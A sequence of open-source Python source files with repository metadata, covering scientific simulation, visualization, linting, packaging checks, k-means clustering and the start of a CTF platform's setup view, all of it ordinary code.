# prefix should not contain underscores; if it does, issue a warning and replace them with hyphens.
if prefix != None:
if '_' in prefix:
warnings.warn("Underscores in prefix will be converted to hyphens.", UserWarning);
prefix = prefix.replace('_', '-');
# If archiveDirectory does not exist, create it.
if not os.path.isdir(archiveDirectory):
os.makedirs(archiveDirectory);
# Loop over structure sets in the result set.
for i, structureSet in enumerate(resultSetGenerator):
# Determine a chemical formula.
chemicalFormula = None;
# We assume here that the supplied resultSet has come from one of the routines in this module, and thus that all structures in each set of spacegroup groups have the same composition.
spacegroupGroups = structureSet.GetStructureSet();
for structures, degeneracies in spacegroupGroups.values():
chemicalFormula = structures[0].GetChemicalFormula(atomicSymbolLookupTable = atomicSymbolLookupTable);
break;
# Build a name for the archive.
# If a prefix has been set, start with that.
archiveName = "{0}_".format(prefix) if prefix != None else "";
# Add the substitution number to the name.
archiveName = archiveName + "{0:0>3}_".format(i + 1);
# Finally, append the chemical formula and the file extension.
archiveName = archiveName + chemicalFormula + ".tar.gz";
# Export the structure set.
StructureSetIO.ExportStructureSet(
structureSet, os.path.join(archiveDirectory, archiveName), fileFormat = fileFormat, atomicSymbolLookupTable = atomicSymbolLookupTable, **kwargs
);
# Yield the structure set back to the caller.
yield structureSet;
def ImportResultSet(prefix = None, archiveDirectory = "./", **kwargs):
# If prefix is supplied, underscores are removed, if present, to mirror ExportAtomicSubstitutionResultSet().
if prefix != None:
if '_' in prefix:
warnings.warn("Underscores in prefix will be converted to hyphens.", UserWarning);
prefix = prefix.replace('_', '-');
# Search archiveDirectory for .tar.gz files.
inputFiles = [];
for entry in os.listdir(archiveDirectory):
absPath = os.path.join(archiveDirectory, entry);
if os.path.isfile(absPath):
if entry[-7:].lower() == ".tar.gz":
inputFiles.append(entry);
# Attempt to parse the file names and group them into result sets.
resultSetGroups = { };
# The format of the file names saved by ExportResultSet is "[<prefix>_]<number>_<chemical_formula>.tar.gz".
for archiveFile in inputFiles:
# Trim the .tar.gz extension and split at the underscore character.
components = archiveFile[:-7].split('_');
archivePrefix, archiveNumber, archiveChemicalFormula = None, None, None;
if len(components) == 2:
if components[0].isdigit():
# Two elements -> archive number + chemical formula.
archiveNumber = int(components[0]);
archiveChemicalFormula = components[1];
else:
continue;
elif len(components) == 3:
if components[1].isdigit():
# Three elements -> archive prefix, number and chemical formula.
archivePrefix = components[0];
archiveNumber = int(components[1]);
archiveChemicalFormula = components[2];
else:
continue;
else:
continue;
# Add prefix to resultSets if required.
if archivePrefix not in resultSetGroups:
resultSetGroups[archivePrefix] = { };
# Set a key from the archive number and chemical formula.
key = (archiveNumber, archiveChemicalFormula);
# If the key is already present, it means archiveDirectory contains archives of multiple result sets that can't be separated.
if key in resultSetGroups[archivePrefix]:
# If a prefix was not supplied, or the archive prefix is equal to the target prefix, we cannot work out what to do without user input -> throw an error.
if prefix == None or archivePrefix == prefix:
raise Exception("Error: Multiple result sets in archive directory \"{0}\" cannot be separated - please specify the prefix manually or remove unwanted result sets.".format(archiveDirectory));
resultSetGroups[archivePrefix][key] = archiveFile;
# Check result sets were found.
if len(resultSetGroups) == 0:
raise Exception("Error: No result set archives found in archive directory \"{0}\".".format(archiveDirectory));
if prefix != None:
# If prefix is specified, check archives with that prefix were found.
if prefix not in resultSetGroups:
raise Exception("Error: Archive files with the prefix \"{0}\" were not found in archive directory \"{1}\".".format(prefix, archiveDirectory));
else:
# If not, check we only found archives with one prefix.
if len(resultSetGroups) > 1:
raise Exception("Error: Result set archives with multiple prefixes were found in archive directory \"{0}\" - please specify a prefix via the prefix keyword.".format(archiveDirectory));
prefix = None;
for key in resultSetGroups.keys():
prefix = key;
break;
# Finally, check the group contain archives with the same number and different chemical formulae, and that the result sets are numbered sequentially from 1.
resultSetGroup = resultSetGroups[prefix];
archiveNumbers = [];
for archiveNumber, _ in resultSetGroup.keys():
if archiveNumber in archiveNumbers:
raise Exception("Error: Archive directory \"{0}\" appears to contain multiple sets of results with the same prefix - please check.".format(archiveDirectory));
archiveNumbers.sort();
for i in range(0, len(archiveNumbers)):
if archiveNumbers[i] != i + 1:
raise Exception("Error: Archives appear to be missing from the specified result set in archive directory \"{0}\".".format(archiveDirectory));
# Read archives.
resultSet = [
StructureSetIO.ImportStructureSet(os.path.join(archiveDirectory, resultSetGroup[key]), **kwargs)
for key in sorted(resultSetGroup.keys(), key = lambda item : item[0])
];
# Return result set.
return resultSet;
|
JMSkelton/Transformer
|
Transformer/Framework/BatchIO.py
|
Python
|
gpl-3.0
| 7,480
|
[
"VASP"
] |
a748d2a7c90c842df09297e72fc8fb40d1fca2dfd2d98392fe3435cfc684f8ac
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
**************************************************************
**espressopp.interaction.DihedralHarmonicUniqueCos**
**************************************************************
.. math::
U = K (cos(\phi) - cos(\phi_0))^2
.. function:: espressopp.interaction.DihedralHarmonicUniqueCos(K)
:param K: (default: 0.0)
:type K: real
.. function:: espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos(system, fqal, potential)
:param system:
:param fqal:
:param potential:
:type system:
:type fqal:
:type potential:
.. function:: espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos.getFixedQuadrupleList()
:rtype: A Python list of lists.
.. function:: espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos.setPotential(potential)
:param potential:
:type potential:
"""
from espressopp import pmi
from espressopp.esutil import *
from espressopp.interaction.DihedralUniquePotential import *
from espressopp.interaction.Interaction import *
from _espressopp import interaction_DihedralHarmonicUniqueCos, \
interaction_FixedQuadrupleAngleListDihedralHarmonicUniqueCos
class DihedralHarmonicUniqueCosLocal(DihedralUniquePotentialLocal, interaction_DihedralHarmonicUniqueCos):
def __init__(self, K=0.0):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, interaction_DihedralHarmonicUniqueCos, K)
class FixedQuadrupleAngleListDihedralHarmonicUniqueCosLocal(InteractionLocal, interaction_FixedQuadrupleAngleListDihedralHarmonicUniqueCos):
def __init__(self, system, fqal, potential):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, interaction_FixedQuadrupleAngleListDihedralHarmonicUniqueCos, system, fqal, potential)
def setPotential(self, potential):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
self.cxxclass.setPotential(self, potential)
def getFixedQuadrupleList(self):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
return self.cxxclass.getFixedQuadrupleAngleList(self)
if pmi.isController:
class DihedralHarmonicUniqueCos(DihedralUniquePotential):
'The DihedralHarmonicUniqueCos potential.'
pmiproxydefs = dict(
cls = 'espressopp.interaction.DihedralHarmonicUniqueCosLocal',
pmiproperty = ['K']
)
class FixedQuadrupleAngleListDihedralHarmonicUniqueCos(Interaction):
__metaclass__ = pmi.Proxy
pmiproxydefs = dict(
cls = 'espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCosLocal',
pmicall = ['setPotential', 'getFixedQuadrupleList']
)
|
capoe/espressopp.soap
|
src/interaction/DihedralHarmonicUniqueCos.py
|
Python
|
gpl-3.0
| 3,722
|
[
"ESPResSo"
] |
017f475499e2b435bb01d3c34e93eaa9e6dc7ce79c9989eaa7350b1b613bb347
|
import astroid
import inspect
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers.utils import check_messages
class ForbiddenImportChecker(BaseChecker):
__implements__ = IAstroidChecker
name = 'forbidden_import'
msgs = {'E9999':
('You may not import any modules - you imported %s on line %s.',
'forbidden-import',
'Used when you use import')}
options = (('allowed-import-modules',
{'default': (),
'type': 'csv',
'metavar': '<modules>',
'help': 'Allowed modules to be imported.'}
),
('extra-imports',
{'default': (),
'type': 'csv',
'metavar': '<extra-modules>',
'help': 'Extra allowed modules to be imported.'}
)
)
# this is important so that your checker is executed before others
priority = -1
@check_messages("forbidden-import")
def visit_import(self, node):
"""visit an Import node"""
temp = [name for name in node.names
if name[0] not in self.config.allowed_import_modules and
name[0] not in self.config.extra_imports]
if temp != []:
self.add_message(
'forbidden-import', node=node,
args=(', '.join(map(lambda x: x[0], temp)), node.lineno))
@check_messages("forbidden-import")
def visit_importfrom(self, node):
"""visit an ImportFrom node"""
if node.modname not in self.config.allowed_import_modules and\
node.modname not in self.config.extra_imports:
self.add_message(
'forbidden-import', node=node,
args=(node.modname, node.lineno))
@check_messages("forbidden-import")
def visit_call(self, node):
if isinstance(node.func, astroid.Name):
name = node.func.name
# ignore the name if it's not a builtin (i.e. not defined in the
# locals nor globals scope)
if not (name in node.frame() or name in node.root()):
if name == "__import__":
if node.args[0].value not in self.config.allowed_import_modules and\
node.args[0].value not in self.config.extra_imports:
args = (node.args[0].value, node.lineno)
# add the message
self.add_message('forbidden-import', node=node,
args=args)
def register(linter):
"""required method to auto register this checker"""
linter.register_checker(ForbiddenImportChecker(linter))
|
RyanDJLee/pyta
|
python_ta/checkers/forbidden_import_checker.py
|
Python
|
gpl-3.0
| 2,792
|
[
"VisIt"
] |
b6c31168ba0fd299f2d954df27c718bd0375029e3e9fb2ad3313e6d9abbaf483
|
#!/usr/bin/env python
"""Prevent unwanted files from being added to the source tree."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import sys
def main():
"""Main entry point."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
allowed_extensions = (
'.cs',
'.ps1',
'.psm1',
'.py',
)
skip_paths = set([
'lib/ansible/config/ansible_builtin_runtime.yml', # not included in the sanity ignore file since it won't exist until after migration
])
skip_directories = (
'lib/ansible/galaxy/data/',
)
for path in paths:
if path in skip_paths:
continue
if any(path.startswith(skip_directory) for skip_directory in skip_directories):
continue
if path.startswith('lib/') and not path.startswith('lib/ansible/'):
print('%s: all "lib" content must reside in the "lib/ansible" directory' % path)
continue
ext = os.path.splitext(path)[1]
if ext not in allowed_extensions:
print('%s: extension must be one of: %s' % (path, ', '.join(allowed_extensions)))
if __name__ == '__main__':
main()
|
maxamillion/ansible
|
test/sanity/code-smell/no-unwanted-files.py
|
Python
|
gpl-3.0
| 1,232
|
[
"Galaxy"
] |
590d5aa0f80bddccecd0f73624023354462a3457966e29f8c9eafaf383a83ddf
|
#!/usr/bin/python
#FILE DESCRIPTION=======================================================
#~ Python script used for post-processing automatization of flow on an
#~ inclined (?textured?) plate (minimal postprocessing to test the results)
#~
#~ NOTES:
#~ - still unfinished BUT improvement
#~ USAGE:
#~ paraFoam --script=./postProcMinimal.py
#LICENSE================================================================
# prostProcMinimal.py
#
# Copyright 2015 Martin Isoz <martin@Poctar>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# PARAMETERS============================================================
xAll = 0.025
ySkip= 0.07
# POSTPROCESSING INITIATION=============================================
import glob
mainCase = glob.glob('./*.OpenFOAM') #works only for the cases with 1 foam file
paraview.simple._DisableFirstRenderCameraReset()
activeSource_OpenFOAM = GetActiveSource()
# enable all available fields
activeSource_OpenFOAM.VolumeFields = ['alpha.liquid', 'p_rgh', 'U']
# show all for internal mesh
activeSource_OpenFOAM.MeshParts = ['internalMesh']
# I dont want to see the main mesh / I do want to see it as transparent wireframe
allIntMeshRepresentation = GetDisplayProperties( activeSource_OpenFOAM )
allIntMeshRepresentation.Visibility = 0
allIntMeshRepresentation.Representation = 'Wireframe'
allIntMeshRepresentation.Opacity = 0.1
# set up black background (seems prettier)
RenderView1 = GetRenderView()
RenderView1.UseTexturedBackground = 0
RenderView1.Background = [0.0, 0.0, 0.0]
activeSource_OpenFOAM = FindSource( mainCase[0] )
# CREATE A SCALAR CLIP - SHOW ONLY THE RIVULET==========================
liqOnly = Clip( ClipType="Scalar", guiName="liqOnly" )
liqOnly.Scalars = ['POINTS', 'alpha.liquid']
liqOnly.Value = 0.5
liqOnlyRepresentation = Show()
liqOnlyRepresentation.Representation = 'Surface'
liqOnlyRepresentation.Visibility = 0
# COLOR THE FILM BY FILM THICKNESS (CALCULATOR+PROPER COLORING)=========
fThCalc = Calculator( guiName="fThCalc" )
fThCalc.Function = 'coordsZ'
fThCalc.ResultArrayName = 'hFun'
fThCalcRepresentation = Show()
fThCalcRepresentation.Visibility = 1
# SCALAR BAR============================================================
# ADD CASE TITLE========================================================
# ADD ANOTATE TIME SOURCE===============================================
annotTime = AnnotateTime()
annotTimeRepresentation = Show()
annotTime.Format = '$\mathrm{Time:\,%5.2f\,s}$'
annotTimeRepresentation.FontFamily = 'Courier'
annotTimeRepresentation.Position = [xAll, 0.025]
annotTimeRepresentation.Visibility = 1
Render()
# POST RUNNING MODIFICATIONS============================================
AnimationScene1 = GetAnimationScene()
AnimationScene1.GoToLast()
Render()
# SCALAR BAR============================================================
source = fThCalc #where to get the data
data = source.GetPointDataInformation()
#get the array and the respective min-max
array = data.GetArray('hFun')
dataRange = array.GetRange(0) #-1 for magnitude
colorObjectRepresentation = fThCalcRepresentation #what object will be colored
a0_hFun_PVLookupTable = GetLookupTableForArray( "hFun", 0,
#~ RGBPoints=[0.0, 0.0, 0.0, 0.0, dataRange[1], 1.0, 1.0, 1.0], #grayscale coloring
#~ ColorSpace='RGB',
RGBPoints=[0.0, 0.0, 0.0, 1.0, dataRange[1], 1.0, 0.0, 0.0], #classical rainbow coloring
ColorSpace='HSV',
ScalarRangeInitialized=1.0 )
a0_hFun_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.0, 0.0, 0.5, 0.0, 1.0, 1.0, 0.5, 0.0] )
colorObjectRepresentation.Representation = 'Surface'
colorObjectRepresentation.ColorArrayName = ('POINT_DATA', 'hFun')
colorObjectRepresentation.LookupTable = a0_hFun_PVLookupTable
a0_hFun_PVLookupTable.ScalarOpacityFunction = a0_hFun_PiecewiseFunction
Render()
ScalarBarWidgetRepresentation = CreateScalarBar( Title='$h(x,y),[\mathrm{m}]$',
ComponentTitle = '',
LabelFontSize = 12,
Enabled = 1,
LookupTable = a0_hFun_PVLookupTable,
TitleFontSize = 14,
AutomaticLabelFormat = 0,
LabelFormat = '$%-#5.2e$',
RangeLabelFormat = '$%-#5.2e$',
)
RenderView1.Representations.append(ScalarBarWidgetRepresentation)
Render()
# SET PROPER CAMERA POSITION============================================
ResetCamera()
RenderView1 = GetRenderView()
RenderView1.CameraViewUp = [-0.9, 0.03, 0.45]
RenderView1.CameraPosition = [0.38, 0.46, 0.42]
RenderView1.CameraFocalPoint = [0.145, 0.0, 0.0]
RenderView1.CameraParallelScale = 0.17
Render()
# LOAD THE CASE AGAIN TO DISPLAY THE CHANNEL============================
showWalls = PV4FoamReader(FileName=mainCase[0], guiName='showWalls')
showWalls.MeshParts = ['wall - group']
showWalls.VolumeFields = []
showWallsRepresentation = Show()
showWallsRepresentation.Representation = 'Surface'
showWallsRepresentation.Visibility = 1
showWallsRepresentation.DiffuseColor = [0.5529411764705883, 0.5529411764705883, 0.5529411764705883]
Render()
# ANIMATION SAVING (PURE IMAGES, NOT BLENDER)===========================
#~ eTime = float("%s"%AnimationScene1.GetProperty('Duration'))
#~
#~ AnimationScene1.GoToFirst()
#~ k = 0;
#~ cTime = float("%s"%AnimationScene1.GetProperty('AnimationTime'))
#~
#~ while (cTime < eTime):
#~ Render()
#~ #x3dExporter=exporters.X3DExporter(FileName='./x3dFiles/rivulet_%03d.x3d'% (k))
#~ #x3dExporter.SetView(GetActiveView()) # <===== NEW LINE
#~ #x3dExporter.Write()
#~ WriteImage('pvAnimation/plate_%03d.png'%k)
#~ AnimationScene1.GoToNext()
#~ k = k+1
#~ cTime = float("%s"%AnimationScene1.GetProperty('AnimationTime'))
|
MartinIsoz/CFD_oF
|
05_freibergExpSetUp/00_Scripts/postProcMinimalV2.py
|
Python
|
gpl-2.0
| 6,562
|
[
"ParaView"
] |
7a8ac627cc964966254a0962c1ccca54243f69b6d8837db1ec03f09ccc553f49
|
# -*- coding: utf-8 -*-
#
# test_parrot_neuron.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
# This script tests the parrot_neuron in NEST.
# See test_parrot_neuron_ps.py for an equivalent test of the precise parrot.
import nest
import unittest
import math
@nest.ll_api.check_stack
class ParrotNeuronTestCase(unittest.TestCase):
"""Check parrot_neuron spike repetition properties"""
def setUp(self):
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
# set up source spike generator, as well as parrot neurons
self.spike_time = 1.
self.delay = .2
self.source = nest.Create("spike_generator", 1,
{"spike_times": [self.spike_time]})
self.parrot = nest.Create('parrot_neuron')
self.spikes = nest.Create("spike_recorder")
# record source and parrot spikes
nest.Connect(self.source, self.spikes)
nest.Connect(self.parrot, self.spikes)
def test_ParrotNeuronRepeatSpike(self):
"""Check parrot_neuron repeats spikes on port 0"""
# connect with arbitrary delay
nest.Connect(self.source, self.parrot, syn_spec={"delay": self.delay})
nest.Simulate(self.spike_time + 2 * self.delay)
# get spike from parrot neuron
events = nest.GetStatus(self.spikes)[0]["events"]
post_time = events['times'][
events['senders'] == self.parrot[0].get('global_id')]
# assert spike was repeated at correct time
assert post_time, "Parrot neuron failed to repeat spike."
assert self.spike_time + self.delay == post_time, \
"Parrot neuron repeated spike at wrong delay"
def test_ParrotNeuronIgnoreSpike(self):
"""Check parrot_neuron ignores spikes on port 1"""
# connect with arbitrary delay to port 1
nest.Connect(self.source, self.parrot,
syn_spec={"receptor_type": 1, "delay": self.delay})
nest.Simulate(self.spike_time + 2. * self.delay)
# get spike from parrot neuron, assert it was ignored
events = nest.GetStatus(self.spikes)[0]["events"]
post_time = events['times'][
events['senders'] == self.parrot.get('global_id')]
assert len(post_time) == 0, \
"Parrot neuron failed to ignore spike arriving on port 1"
def test_ParrotNeuronOutgoingMultiplicity(self):
"""
Check parrot_neuron correctly repeats multiple spikes
The parrot_neuron receives two spikes in a single time step.
We check that both spikes are forwarded to the spike_recorder.
"""
# connect twice
nest.Connect(self.source, self.parrot, syn_spec={"delay": self.delay})
nest.Connect(self.source, self.parrot, syn_spec={"delay": self.delay})
nest.Simulate(self.spike_time + 2. * self.delay)
# get spikes from parrot neuron, assert two were transmitted
events = nest.GetStatus(self.spikes)[0]["events"]
post_times = events['times'][
events['senders'] == self.parrot.get('global_id')]
assert len(post_times) == 2 and post_times[0] == post_times[1], \
"Parrot neuron failed to correctly repeat multiple spikes."
@nest.ll_api.check_stack
class ParrotNeuronPoissonTestCase(unittest.TestCase):
"""Check parrot_neuron spike repetition properties"""
def test_ParrotNeuronIncomingMultiplicity(self):
"""
Check parrot_neuron heeds multiplicity information in incoming spikes.
This test relies on the fact that poisson_generator transmits
multiple spikes during a time step using multiplicity, and that
these spikes are delivered directly, i.e., without multiplicity-
unrolling in send_remote().
We create a high-rate poisson_generator. If parrot_neuron
ignored multiplicity, it would only transmit one spike per time
step. We chain two parrot_neurons to check against any loss.
"""
# set up source spike generator, as well as parrot neurons
h = 0.1 # ms
rate = 1000000. # spikes / s
delay = 1. # ms
t_base = 1000. # ms
t_sim = t_base + 3 * delay # after t_sim, spikes from t_base arrived
spikes_expected = rate * t_base / 1000.
spikes_std = math.sqrt(spikes_expected)
# if the test is to be meaningful we must expect signficantly more
# spikes than time steps
assert spikes_expected - 3 * spikes_std > 10. * t_sim / h, \
"Internal inconsistency: too few spikes."
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
nest.SetKernelStatus({'resolution': h,
'grng_seed': 123,
'rng_seeds': [456]})
source = nest.Create('poisson_generator', params={'rate': rate})
parrots = nest.Create('parrot_neuron', 2)
spike_rec = nest.Create('spike_recorder')
nest.Connect(source, parrots[:1], syn_spec={'delay': delay})
nest.Connect(parrots[:1], parrots[1:], syn_spec={'delay': delay})
nest.Connect(parrots[1:], spike_rec)
nest.Simulate(t_sim)
n_spikes = nest.GetStatus(spike_rec)[0]['n_events']
assert n_spikes > spikes_expected - 3 * spikes_std, \
"parrot_neuron loses spikes."
assert n_spikes < spikes_expected + 3 * spikes_std, \
"parrot_neuron adds spikes."
@nest.ll_api.check_stack
class ParrotNeuronSTDPTestCase(unittest.TestCase):
"""
Check STDP protocol between two parrot_neurons connected by a stdp_synapse.
Exact pre- and postsynaptic spike times are set by spike_generators
connected to each parrot neuron. Additional spikes sent through the
stdp_synapse are explicitly ignored in the postsynaptic parrot_neuron
by setting the stdp_synapse to connect to port 1.
"""
def run_protocol(self, dt):
"""Set up a network with pre-post spike pairings
with t_post - t_pre = dt"""
nest.set_verbosity("M_WARNING")
nest.ResetKernel()
# set pre and postsynaptic spike times
delay = 1. # delay for connections
dspike = 100. # ISI
# set the correct real spike times for generators (correcting for
# delays)
pre_times = [100., 100. + dspike]
post_times = [k + dt for k in pre_times]
# create spike_generators with these times
pre_spikes = nest.Create("spike_generator", 1, {
"spike_times": pre_times})
post_spikes = nest.Create("spike_generator", 1, {
"spike_times": post_times})
# create parrot neurons and connect spike_generators
pre_parrot = nest.Create("parrot_neuron", 1)
post_parrot = nest.Create("parrot_neuron", 1)
nest.Connect(pre_spikes, pre_parrot, syn_spec={"delay": delay})
nest.Connect(post_spikes, post_parrot, syn_spec={"delay": delay})
# create spike recorder
spikes = nest.Create("spike_recorder")
nest.Connect(pre_parrot, spikes)
nest.Connect(post_parrot, spikes)
# connect both parrot neurons with a stdp synapse onto port 1
# thereby spikes transmitted through the stdp connection are
# not repeated postsynaptically.
syn_spec = {
"synapse_model": "stdp_synapse",
# set receptor 1 postsynaptically, to not generate extra spikes
"receptor_type": 1,
}
conn_spec = {
"rule": "one_to_one",
}
nest.Connect(pre_parrot, post_parrot,
syn_spec=syn_spec, conn_spec=conn_spec)
# get STDP synapse and weight before protocol
syn = nest.GetConnections(
source=pre_parrot, synapse_model="stdp_synapse")
w_pre = syn.get('weight')
last_time = max(pre_times[-1], post_times[-1])
nest.Simulate(last_time + 2 * delay)
# get weight post protocol
w_post = syn.get('weight')
return w_pre, w_post
def test_ParrotNeuronSTDPProtocolPotentiation(self):
"""Check pre-post spike pairings between parrot_neurons
increments weights."""
dt = 10.
w_pre, w_post = self.run_protocol(dt)
assert w_pre < w_post, "Parrot neuron STDP potentiation \
protocol failed to elicit positive weight changes."
def test_ParrotNeuronSTDPProtocolDepression(self):
"""Check post-pre spike pairings between parrot_neurons
decrement weights."""
dt = -10.
w_pre, w_post = self.run_protocol(dt)
assert w_pre > w_post, "Parrot neuron STDP potentiation \
protocol failed to elicit negative weight changes."
def suite():
# makeSuite is sort of obsolete http://bugs.python.org/issue2721
# using loadTestsFromTestCase instead.
suite1 = unittest.TestLoader().loadTestsFromTestCase(
ParrotNeuronTestCase)
suite2 = unittest.TestLoader().loadTestsFromTestCase(
ParrotNeuronPoissonTestCase)
suite3 = unittest.TestLoader().loadTestsFromTestCase(
ParrotNeuronSTDPTestCase)
return unittest.TestSuite([suite1, suite2, suite3])
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
|
SepehrMN/nest-simulator
|
pynest/nest/tests/test_parrot_neuron.py
|
Python
|
gpl-2.0
| 10,016
|
[
"NEURON"
] |
7151170dd330dd22ac7c7d392aafa80da8465d425221a5edec1d557f178b79e4
|
from __future__ import absolute_import
# coding=utf-8
from flask import request
from flask.views import MethodView
from flask.blueprints import Blueprint
from firefly.models.consts import KEYBOARD_URL_MAPS
from firefly.libs.template import render_template
bp = Blueprint('keyboard', __name__, url_prefix='/keyboard')
class KeyboardView(MethodView):
def get(self):
url = request.args.get('url', '')
url_pattern = url.rsplit('/', 1)[0]
keyboards = KEYBOARD_URL_MAPS['default']
if url_pattern in KEYBOARD_URL_MAPS:
keyboards += KEYBOARD_URL_MAPS[url_pattern]
columns = zip(*[iter(keyboards)] * 2)
return render_template(
'widgets/keyboard.html', columns=columns
)
bp.add_url_rule('/', view_func=KeyboardView.as_view('keyboard'))
|
matrixorz/firefly
|
firefly/views/keyboard.py
|
Python
|
mit
| 817
|
[
"Firefly"
] |
7eac1f20fdaf37603e4546bebd5585aa02fd8162ef9faa792b25d83c738143a2
|
#!/usr/bin/env python
"""
Testing k-means clustering
for purely random and normally distributed data
"""
import os
import math
import random
from numpy import array, random as numpy_random
from ase.data import chemical_symbols
from kmeans import Point, kmeans, k_from_n
from element_groups import get_element_group
from set_path import VIS_PATH
DISTRIB = 'GAUSSIAN'
data, ref = [], []
N = 200
def gaussian_distribution(N, k):
n = float(N)/k
X = []
for i in range(k):
init = (random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1))
s = random.uniform(0.05, 0.5)
x = []
while len(x) < n:
a, b, c = array([numpy_random.normal(init[0], s), numpy_random.normal(init[1], s), numpy_random.normal(init[2], s)])
if abs(a) < 1 and abs(b) < 1 and abs(c) < 1:
x.append([a,b,c])
X.extend(x)
X = array(X)[:N]
return X
if DISTRIB == 'RANDOM':
set_x, set_y = [random.choice(chemical_symbols) for i in range(N)], [random.choice(chemical_symbols) for i in range(N)]
set_z = [round(random.uniform(0.1, 15.0), 2) for i in range(N)]
data, ref = [], []
for i in range(N):
formula = set_x[i] + set_y[i]
set_x[i] = get_element_group(chemical_symbols.index(set_x[i]))
set_y[i] = get_element_group(chemical_symbols.index(set_y[i]))
data.append(Point([set_x[i], set_y[i], set_z[i]], formula))
ref.append([set_x[i], set_y[i], set_z[i]])
else:
nte = len(chemical_symbols)
G = gaussian_distribution(N, k_from_n(N))
set_x = (G[:,0] + 1)/2*nte
set_x = map(lambda x: int(math.floor(x)), set_x.tolist())
set_y = (G[:,1] + 1)/2*nte
set_y = map(lambda x: int(math.floor(x)), set_y.tolist())
set_z = (G[:,2] + 1)/2*15
set_z = map(lambda x: round(x, 2), set_z.tolist())
for i in range(N):
formula = chemical_symbols[set_x[i]] + chemical_symbols[set_y[i]]
set_x[i] = get_element_group(set_x[i])
set_y[i] = get_element_group(set_y[i])
data.append(Point([set_x[i], set_y[i], set_z[i]]))
ref.append([set_x[i], set_y[i], set_z[i], formula])
clusters = kmeans(data, k_from_n(len(data)))
points_file = os.path.join(VIS_PATH, "points.csv")
cluster_file = os.path.join(VIS_PATH, "clusters.csv")
with open(points_file, "w") as s:
s.write("x,y,z,label\n")
for n, i in enumerate(ref):
s.write(",".join(map(str, i)) + "\n")
with open(cluster_file, "w") as s:
s.write("x,y,z\n")
for n, c in enumerate(clusters, 1):
for p in c.points:
s.write(",".join(map(str, p.coords)) + "\n")
s.write("-,-,-\n")
print points_file
print cluster_file
|
ansobolev/tilde
|
tutorials/simple_data_mining/sample_kmeans.py
|
Python
|
mit
| 2,670
|
[
"ASE",
"Gaussian"
] |
e274284b7253052758de0741c2b76de2458feb0bc544e79666673cc5b934cc53
|
import os
import re
from datetime import datetime
from flask import current_app as app, render_template, request, redirect, abort, jsonify, url_for, session, Blueprint, Response, send_file
from jinja2.exceptions import TemplateNotFound
from passlib.hash import bcrypt_sha256
from sqlalchemy import union_all
from CTFd.utils import authed, is_setup, validate_url, get_config, set_config, sha512, cache, ctftime, view_after_ctf, ctf_started, \
is_admin
from CTFd.models import db, Students, Solves, Awards, Files, Pages, Teams, Challenges, Sections
views = Blueprint('views', __name__)
@views.before_request
def redirect_setup():
if request.path.startswith("/static"):
return
if not is_setup() and request.path != "/setup":
return redirect(url_for('views.setup'))
@views.route('/setup', methods=['GET', 'POST'])
def setup():
# with app.app_context():
# admin = Teams.query.filter_by(admin=True).first()
if not is_setup():
if not session.get('nonce'):
session['nonce'] = sha512(os.urandom(10))
if request.method == 'POST':
ctf_name = request.form['ctf_name']
ctf_name = set_config('ctf_name', ctf_name)
# CSS
css = set_config('start', '')
# Admin user
name = request.form['name']
email = request.form['email']
password = request.form['password']
section = Sections(0, 123)
db.session.add(section)
db.session.commit()
team = Teams("admin", section.sectionNumber)
db.session.add(team)
db.session.commit()
admin = Students(name, email, password, team.id, section.sectionNumber)
admin.admin = True
admin.banned = True
# Index page
page = Pages('index', """<div class="container main-container">
<img class="logo" src="{0}/static/original/img/logo.png" />
<h3 class="text-center">
Welcome to a cool CTF framework written by <a href="https://github.com/ColdHeat">Kevin Chung</a> of <a href="https://github.com/isislab">@isislab</a>
